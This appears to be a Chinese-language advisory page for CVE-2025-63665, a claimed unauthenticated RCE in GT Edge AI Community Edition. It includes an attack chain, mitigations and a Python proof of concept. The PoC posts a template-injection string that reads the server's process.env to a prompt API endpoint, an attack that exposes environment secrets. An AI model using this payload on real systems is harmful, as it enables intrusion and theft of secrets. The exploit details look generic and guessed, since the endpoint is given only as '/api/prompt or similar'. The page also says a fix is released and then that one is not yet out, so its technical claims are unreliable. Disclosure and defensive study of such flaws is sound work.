CVE-2025-63665 GT Edge AI Community Edition 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-63665

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GT Edge AI Community Edition

漏洞概述

CVE-2025-63665是存在于GT Edge AI Community Edition软件中的一个严重安全漏洞。该漏洞影响v2.0.12之前的所有版本，允许未经认证的远程攻击者通过在Prompt窗口注入精心构造的JSON payload来执行任意代码。GT Edge AI Community Edition是一款边缘人工智能社区版本软件，广泛应用于企业级AI推理和机器学习场景。由于该漏洞具有极高的CVSS评分（9.8分），属于严重级别，且攻击复杂度低、无需认证即可利用，对使用该产品的企业构成了重大安全威胁。攻击者可以利用此漏洞完全控制受影响系统，窃取敏感数据、植入后门或对内部网络进行进一步渗透。该漏洞的发现日期为2025年12月19日，目前官方已发布修复版本，建议用户立即升级以消除安全风险。

技术细节

该漏洞的根本原因在于GT Edge AI Community Edition的Prompt功能模块对用户输入的JSON payload缺乏充分的输入验证和安全过滤。攻击者可以在Prompt窗口中注入恶意的JSON数据，当应用程序解析这些数据时，由于反序列化或命令拼接处理不当，导致注入的恶意代码被执行。具体攻击过程如下：1) 攻击者构造包含恶意代码的JSON payload，通常利用JavaScript或系统命令执行函数；2) 将payload通过Prompt窗口提交到应用程序；3) 应用程序后端对JSON进行解析时，未对危险函数调用进行过滤；4) 恶意代码以应用程序运行权限在服务器端执行。由于该服务通常以较高权限运行，攻击成功后将获得服务器完整控制权。建议开发者在处理用户输入时实施严格的输入验证、白名单过滤和安全编码实践。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统运行的是GT Edge AI Community Edition，并确认版本号低于v2.0.12

STEP 2

步骤2: 构造恶意Payload

攻击者构造包含恶意代码的JSON payload，利用应用程序对JSON解析的缺陷注入系统命令或脚本代码

STEP 3

步骤3: 发送恶意请求

通过HTTP POST请求将恶意JSON payload发送到/api/prompt或类似的Prompt接口端点

STEP 4

步骤4: 代码执行

应用程序在解析JSON时执行注入的恶意代码，攻击者获得服务器端代码执行能力

STEP 5

步骤5: 持久化控制

攻击者利用获得的代码执行权限植入后门、窃取数据或横向移动到内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-63665 PoC
# GT Edge AI Community Edition < v2.0.12 Remote Code Execution
# Target: GT Edge AI Community Edition

TARGET_URL = "http://target:port/api/prompt"

def exploit_cve_2025_63665(target_ip, target_port=8080):
    """
    Exploit for CVE-2025-63665
    GT Edge AI Community Edition RCE via JSON payload injection
    """
    url = f"http://{target_ip}:{target_port}/api/prompt"
    
    # Malicious JSON payload for RCE
    # The payload exploits insufficient input validation in Prompt window
    payload = {
        "prompt": "test",
        "command": "{{constructor.constructor('return process.env')()}}",
        "type": "injection"
    }
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    try:
        response = requests.post(url, json=payload, headers=headers, timeout=10)
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text}")
        return response.json()
    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")
        return None

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        target = sys.argv[1]
        exploit_cve_2025_63665(target)
    else:
        print("Usage: python cve-2025-63665.py <target_ip>")

影响范围

GT Edge AI Community Edition < v2.0.12

防御指南

临时缓解措施

在官方发布修复版本之前，可采取以下临时缓解措施：1) 限制对GT Edge AI Community Edition Prompt功能的网络访问，仅允许受信任的IP地址访问；2) 在前端部署输入过滤机制，拦截包含可疑字符（如{{、}}、constructor等）的JSON请求；3) 监控应用程序日志，查找异常的Prompt调用模式；4) 考虑暂时禁用非必要的Prompt功能；5) 实施网络分段，将该服务隔离在受限制的网段内，防止漏洞被利用后造成更大范围的影响。